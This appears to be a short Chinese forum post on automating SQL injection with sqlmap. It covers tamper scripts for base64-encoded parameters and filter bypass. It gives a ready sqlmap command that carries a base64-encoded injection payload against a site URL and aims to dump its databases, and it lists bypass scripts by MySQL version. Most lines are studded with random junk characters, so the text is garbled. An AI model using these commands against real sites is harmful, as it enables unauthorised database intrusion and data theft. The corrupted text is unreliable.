WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?" ?( r, Y5 J8 n% P6 w. u+ y
( z% `' Y7 P' G- f' }4 o
sqlmap的tamper里有个base64encode.py: {) l6 ?' J! f! z1 ~7 u
# u% B' C& e1 A- ~3 t使用如下% M- _; \- Z4 X/ |2 s; h* |
L H# n; B+ T% G, \7 J7 A% Jsqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs2 q( e; U4 z# g, t Y: J/ p+ ~& }8 O
- ]7 C, P# m4 x2 Y5 }. t9 x0 W: y2 N; i* ^/ ]( B/ F
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
& @7 ^- I- @- |: |6 g# O2 e$ S1 R6 Y; L7 c* L3 r$ T) y% T ^/ j
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:; m! G+ Z F4 L4 b/ |5 W9 H
, a( T% _3 t; J
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入% o$ V4 r% P3 _. o0 Y, [
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
3 H2 {( I" h0 i# w$ t& a9 m首先确定目标数据库版本,然后选择相应的脚本。8 E9 m3 |. G* F0 ?4 @6 _/ K
-v 3 --batch --tamper "space2hash.py"
+ k* x R0 d3 W3 [! V9 c
& a! o9 L4 S4 C还有其他一些插件:3 b- p3 {( |- i, O) O
encodes编码 ——charencode.py1 z1 g( V1 Y) i; Z1 J* U2 F
base64编码 —— base64encode.py
# n& q" x' _7 Y: |* M F替换空格和关键字 —— halfversionedmorekeywords.py; L" B- e! [ j" l
| 6 } F- t: e8 K
1 ]2 O- ^' D$ K1 k0 \( n
/ w* c& G; b4 z* @# s9 d9 X- W( C" ]! E
|